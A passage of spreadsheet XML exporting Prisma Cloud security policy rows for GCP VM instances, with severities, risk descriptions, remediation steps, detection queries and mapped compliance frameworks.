      <c r="AJ2842" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2842" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2843">
      <c r="A2843" t="inlineStr"/>
      <c r="B2843" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2843" s="2" t="inlineStr"/>
      <c r="D2843" t="n">
        <v>1130</v>
      </c>
      <c r="E2843" t="n">
        <v>0</v>
      </c>
      <c r="F2843" t="n">
        <v>38</v>
      </c>
      <c r="G2843" t="b">
        <v>1</v>
      </c>
      <c r="H28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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2843" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2843" t="inlineStr">
        <is>
          <t>Unauthorized Resource Creation risk due to a publicly exposed and vulnerable GCP VM instance with risky Deployment Manager permissions</t>
        </is>
      </c>
      <c r="L2843" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2843" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2843" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2843" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2843" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2843" t="inlineStr"/>
      <c r="R2843" t="inlineStr"/>
      <c r="S2843" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2843" t="b">
        <v>0</v>
      </c>
      <c r="U2843" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2843" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2843" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed with critical or high vulnerabilities and have risky Deployment Manager permissions.
A publicly exposed and vulnerable GCP VM instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. GCP VM instance with deployment manager permissions could further expand the surface of the attack and grant unauthorized access to create any new resource in the project and cause internet exposure, privilege escalation, or lateral movements.
This policy checks for the following risky deployment manager permissions:
'deploymentmanager.deployments.create', 'deploymentmanager.deployments.update'.
Immediate attention is required to grant the least privileges required and remove unwanted risky permissions assigned to the VM instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2843"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[PERMISSION]
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43" t="inlineStr"/>
      <c r="Z2843" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP VM instance with permissions over Deployments Manager') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2843" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2843" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2843" t="inlineStr"/>
      <c r="AD2843" t="b">
        <v>1</v>
      </c>
      <c r="AE2843" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2843" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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3" t="inlineStr">
        <is>
          <t>c9d60a95-7392-4413-ac91-166a759b10de</t>
        </is>
      </c>
      <c r="AI2843" t="inlineStr">
        <is>
          <t>14c1860e-8553-4de2-a46e-c0fb055c4f6b</t>
        </is>
      </c>
      <c r="AJ2843" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2843" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2844">
      <c r="A2844" t="inlineStr"/>
      <c r="B2844" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2844" s="2" t="inlineStr"/>
      <c r="D2844" t="n">
        <v>1166</v>
      </c>
      <c r="E2844" t="n">
        <v>0</v>
      </c>
      <c r="F2844" t="n">
        <v>38</v>
      </c>
      <c r="G2844" t="b">
        <v>1</v>
      </c>
      <c r="H2844" t="inlineStr">
        <is>
          <t>ALERT ALL test, Audit jmontufar, Azure AKS cluster Azure CNI networking not enabled, AzureDriftDetection, BG-AH-Email-Test, BPtestTag, Critical Misconfigs to ServiceNow, DM_TEST_GCP_test, Default Alert Rule, Exposed Cloud Functions, GCP Merchant, GCP test,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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2844" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2844" t="inlineStr">
        <is>
          <t>Unauthorized access risk due to a publicly exposed and vulnerable GCP VM instance</t>
        </is>
      </c>
      <c r="L2844" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2844" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2844" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2844" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2844" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2844" t="inlineStr"/>
      <c r="R2844" t="inlineStr"/>
      <c r="S2844" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2844" t="b">
        <v>0</v>
      </c>
      <c r="U2844" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2844" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2844" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances which are publicly exposed and have critical or high vulnerabilities.
Attackers can exploit these vulnerabilities to compromise the confidentiality, integrity, and availability of the affected VM instance, enabling them to perform malicious actions. The public exposure of these vulnerable VM instances makes them an easy target for attacks.
Immediate attention is required to remediate the critical and high vulnerabilities, and restrict public exposure reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2844"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44" t="inlineStr"/>
      <c r="Z2844" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2844" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2844" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2844" t="inlineStr"/>
      <c r="AD2844" t="b">
        <v>1</v>
      </c>
      <c r="AE2844" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2844" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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GCP test - Notifications:, AccountGroups:avega-active-directory,Default Account Group,loblaw-ag,Pramm-XSIAM,Test_Praveen_Webinar2,Matt's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4" t="inlineStr">
        <is>
          <t>c3f2b563-a7b5-4b50-9b04-0f41eb9dd396</t>
        </is>
      </c>
      <c r="AI2844" t="inlineStr">
        <is>
          <t>d3ecaee2-098e-42d9-9f8f-9c188b1c0dab</t>
        </is>
      </c>
      <c r="AJ2844" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2844" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2845">
      <c r="A2845" t="inlineStr">
        <is>
          <t>CSA CCM v3.0.1, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, CSA CCM v3.0.1, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-172, CIS Controls v7.1, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CIS Controls v8.1, CSA CCM v3.0.1, APRA (CPS 234) Information Security, RBI Baseline Cyber Security and Resilience Requirements, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v3.0.1, CDC NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, NIST 800-53 Rev 5, ISO/IEC 27017:2015, ISO/IEC 27017:2015, CSA CCM v3.0.1, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27001:2022, NIST 800-53 Rev4, NIST CSF, CIS Controls v8, ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, RBI Baseline Cyber Security and Resilience Requirements, NIST 800-53 Rev4, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS Controls v8, Copy of CIS Controls v8, ISO/IEC 27017:2015, Copy of CIS Controls v8, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, CDC NIST 800-53 Rev4, CSA CCM v3.0.1, ISO 27002:2022, ISO 27002:2022, CSA CCM v3.0.1, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), NIST 800-53 Rev 5, ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v3.0.1, CSA CCM v.4.0.1, CSA CCM v3.0.1, CSA CCM v.4.0.1, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27018:2019, CIS Controls v8.1</t>
        </is>
      </c>
      <c r="B2845" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2845" s="2" t="inlineStr"/>
      <c r="D2845" t="inlineStr"/>
      <c r="E2845" t="inlineStr"/>
      <c r="F2845" t="inlineStr"/>
      <c r="G2845" t="b">
        <v>1</v>
      </c>
      <c r="H28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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2845" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2845" t="inlineStr">
        <is>
          <t>GCP VM Instances without any Custom metadata information</t>
        </is>
      </c>
      <c r="L2845" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2845" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2845" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2845" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2845" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2845" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2845" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2845" t="inlineStr">
        <is>
          <t>GCP</t>
        </is>
      </c>
      <c r="T2845" t="b">
        <v>0</v>
      </c>
      <c r="U2845" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2845" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2845" t="inlineStr">
        <is>
          <t>VM instance does not have any Custom metadata. Custom metadata can be used for easy identification and searches.</t>
        </is>
      </c>
      <c r="X2845" t="inlineStr">
        <is>
          <t>1. Login to GCP Console and from Compute, select Compute Engine.
        2. Select the identified VM instance to see the details.
        3. In the details page, click on Edit and navigate to Custom metadata section.
        4. Add the appropriate Key:Value information and save.</t>
        </is>
      </c>
      <c r="Y2845" t="inlineStr"/>
      <c r="Z2845" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name= 'gcloud-compute-instances-list' and json.rule = ['metadata'].items does not exist and (status equals RUNNING and name does not start with "gke-")</t>
        </is>
      </c>
      <c r="AA2845" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2845" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2845" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-81</t>
        </is>
      </c>
      <c r="AD2845" t="b">
        <v>1</v>
      </c>
      <c r="AE2845" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2845" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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5" t="inlineStr">
        <is>
          <t>10bc76ee-6f29-4c04-98bb-b9f8bafb0964</t>
        </is>
      </c>
      <c r="AI2845" t="inlineStr">
        <is>
          <t>10bc76ee-6f29-4c04-98bb-b9f8bafb0964</t>
        </is>
      </c>
      <c r="AJ2845" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2845" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2846">
      <c r="A2846" t="inlineStr"/>
      <c r="B2846" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2846" s="2" t="inlineStr"/>
      <c r="D2846" t="n">
        <v>6</v>
      </c>
      <c r="E2846" t="n">
        <v>0</v>
      </c>
      <c r="F2846" t="n">
        <v>0</v>
      </c>
      <c r="G2846" t="b">
        <v>1</v>
      </c>
      <c r="H28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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2846" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2846" t="inlineStr">
        <is>
          <t>Privilege escalation, lateral movement, or unauthorized cloud account actions risk due to a publicly exposed and vulnerable GCP VM instance with a default service account attached and having Cloud Platform access scope</t>
        </is>
      </c>
      <c r="L2846" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2846" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2846" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2846" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2846" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2846" t="inlineStr"/>
      <c r="R2846" t="inlineStr"/>
      <c r="S2846" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2846" t="b">
        <v>0</v>
      </c>
      <c r="U2846" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2846" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2846" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances which are publicly exposed with critical or high vulnerabilities have default service account attached and having Cloud Platform access scope.
Publicly exposed vulnerable VM instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. The Compute Engine default service account is automatically created in a GCP project when Compute Engine API is enabled and granted the IAM basic Editor role. This service account is attached to all VM instances created unless specified otherwise. Compute Engine default service account on the instance further helps the attackers to escalate their privileges, move laterally or perform other unauthorized actions in the cloud account.
Immediate attention is required to review role assignments and grant only the least privileges required. Remove unwanted roles assigned to the VM instance. Remediate critical and high vulnerabilities, and restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2846"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[MISCONFIGURATION]
1. Log in to the GCP portal
2. Go to Compute Engine
3. Choose VM instances
4. Click on the reported VM instance for which you want to change the service account
5. If the instance is not stopped, click the 'Stop' button. Wait for the instance to be stopped
6. Next, click the 'Edit' button
7. Scroll down to the 'Service Account' section, From the drop-down menu, select the desired service account.
8. Ensure 'Allow full access to all Cloud APIs' is not selected or 'Cloud Platform' under 'Set access for each API' is not enabled
9. Click the 'Save' button and then click 'START' to start the VM instance.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2846" t="inlineStr"/>
      <c r="Z2846" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP VM instance using a default service account with Cloud Platform access scope') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2846" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2846" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:14</t>
        </is>
      </c>
      <c r="AC2846" t="inlineStr"/>
      <c r="AD2846" t="b">
        <v>1</v>
      </c>
      <c r="AE2846" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2846" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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6" t="inlineStr">
        <is>
          <t>eb67e540-4e02-4640-9a7f-9ea7b3b5390a</t>
        </is>
      </c>
      <c r="AI2846" t="inlineStr">
        <is>
          <t>34d76a2b-d152-49a4-97e2-334a2fe1ebad</t>
        </is>
      </c>
      <c r="AJ2846" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2846" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2847">
      <c r="A2847" t="inlineStr"/>
      <c r="B2847" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2847" s="2" t="inlineStr"/>
      <c r="D2847" t="n">
        <v>3</v>
      </c>
      <c r="E2847" t="n">
        <v>0</v>
      </c>
      <c r="F2847" t="n">
        <v>0</v>
      </c>
      <c r="G2847" t="b">
        <v>1</v>
      </c>
      <c r="H28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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2847" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2847" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to publicly exposed and vulnerable GCP VM instance [OpenSSL, CVE-2022-3602]</t>
        </is>
      </c>
      <c r="L2847" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2847" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2847" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2847" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2847" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2847" t="inlineStr"/>
      <c r="R2847" t="inlineStr"/>
      <c r="S2847" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2847" t="b">
        <v>0</v>
      </c>
      <c r="U2847" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2847" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2847" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have known exploitable privilege escalation vulnerability [CVE-2022-3602].
Privilege escalation vulnerability is a security flaw allowing a user to gain unauthorized elevated system access. Exploiting this vulnerability compromises system security, enabling unauthorized data access or manipulation. The fact that the GCP VM instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the OpenSSL [CVE-2022-3602] vulnerability and public exposure reported for the cloud function as soon as possible.</t>
        </is>
      </c>
      <c r="X2847" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict access to GCP VM instance by modifying VPC Firewall rules
1. Log in to the GCP console
2. Navigate to the Compute Engine dashboard
3. Identify the reported VM instance that you want to restrict public access
4. Under 'Network interfaces' section, click on the resource mentioned under 'Network'
5. In 'VPC network details' page, go to 'FIREWALLS' tab
6. Click on the firewall rules that allow unrestricted access (0.0.0.0/0)
7. Select 'EDIT' under 'Source IPv4 ranges' remove (0.0.0.0/0) and add to the trusted IP address
8. Click 'Save rules' to apply the changes
[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2022-3602
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-3602</t>
        </is>
      </c>
      <c r="Y2847" t="inlineStr"/>
      <c r="Z2847" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-3602'))</t>
        </is>
      </c>
      <c r="AA2847" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2847" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2847" t="inlineStr"/>
      <c r="AD2847" t="b">
        <v>1</v>
      </c>
      <c r="AE2847" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2847" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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7" t="inlineStr">
        <is>
          <t>5629dc63-4784-4b2d-b835-1bcb15b4230e</t>
        </is>
      </c>
      <c r="AI2847" t="inlineStr">
        <is>
          <t>78600537-eb1e-4194-b173-294649e062ca</t>
        </is>
      </c>
      <c r="AJ2847" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2847" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2848">
      <c r="A2848" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Demo_Daryl ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, ISO 27002:2022, ISO/IEC 27002:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO 27002:2022, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-172, HITRUST CSF v.11.2.0, NIST SP 800-171 Revision 3, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, CIS Controls v8.1, ISO/IEC 27018:2019, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, ISO/IEC 27017:2015, NIST SP 800-171 Revision 2, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Sarbanes Oxley Act (SOX), PCI DSS v3.2.1, Insurance Regulatory And Development Authority Of India, NIST CSF v2.0, CIS Controls v8, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST CSF v2.0, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, Demo_Daryl ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CSA CCM v.4.0.1, CIS v1.0.0 (GCP), CIS Controls v7.1, ISO/IEC 27002:2013, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Brazilian Data Protection Law (LGPD), Brazilian Data Protection Law (LGPD), PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2848" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C2848" s="2" t="inlineStr"/>
      <c r="D2848" t="n">
        <v>0</v>
      </c>
      <c r="E2848" t="n">
        <v>17</v>
      </c>
      <c r="F2848" t="n">
        <v>1</v>
      </c>
      <c r="G2848" t="b">
        <v>1</v>
      </c>
      <c r="H28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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2848" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2848" t="inlineStr">
        <is>
          <t>GCP VM instance using a default service account with Cloud Platform access scope</t>
        </is>
      </c>
      <c r="L2848" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2848" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2848" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2848" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2848" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2848" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2848" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2848" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2848" t="b">
        <v>0</v>
      </c>
      <c r="U2848" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2848" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2848" t="inlineStr">
        <is>
          <t>This policy identifies the GCP VM instances that are using a default service account with cloud-platform access scope. To compliant with the principle of least privileges and prevent potential privilege escalation it is recommended that instances are not assigned to default service account 'Compute Engine default service account' with scope 'cloud-platform'.</t>
        </is>
      </c>
      <c r="X2848" t="inlineStr">
        <is>
          <t>1. Log in to the GCP portal
2. Go to Compute Engine
3. Choose VM instances
4. Click on the reported VM instance for which you want to change the service account
5. If the instance is not stopped, click the 'Stop' button. Wait for the instance to be stopped
6. Next, click the 'Edit' button
7. Scroll down to the 'Service Account' section, From the drop-down menu, select the desired service account.
8. Ensure 'Allow full access to all Cloud APIs' is not selected or 'Cloud Platform' under 'Set access for each API' is not enabled
9. Click the 'Save' button and then click 'START' to start the VM instance. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-2
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-2</t>
        </is>
      </c>
      <c r="Y2848" t="inlineStr"/>
      <c r="Z2848" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-compute-instances-list' AND json.rule = (status equals RUNNING and name does not start with "gke-") and serviceAccounts[*].email contains "-compute@developer.gserviceaccount.com" and serviceAccounts[*].scopes[*] any equal "https://www.googleapis.com/auth/cloud-platform"
{"category":"IAM","resourceTypes":["google_compute_instance"]}</t>
        </is>
      </c>
      <c r="AA2848" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2848" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2848" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-534-CKV_GCP_31</t>
        </is>
      </c>
      <c r="AD2848" t="b">
        <v>1</v>
      </c>
      <c r="AE2848" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2848" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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8" t="inlineStr">
        <is>
          <t>7e4e6196-4922-4efd-acb9-7a4afc1c379a</t>
        </is>
      </c>
      <c r="AI2848" t="inlineStr">
        <is>
          <t>b47d9e56-f289-46c4-a8e2-3c0b564f2c6a</t>
        </is>
      </c>
      <c r="AJ2848" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2848" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2849">
      <c r="A2849" t="inlineStr"/>
      <c r="B2849" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2849" s="2" t="inlineStr"/>
      <c r="D2849" t="inlineStr"/>
      <c r="E2849" t="inlineStr"/>
      <c r="F2849" t="inlineStr"/>
      <c r="G2849" t="b">
        <v>1</v>
      </c>
      <c r="H28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49" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2849" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2849" t="inlineStr">
        <is>
          <t>Potential malicious activity on GCP VM instance affected by malware</t>
        </is>
      </c>
      <c r="L2849" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING,MALWARE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2849" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2849" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
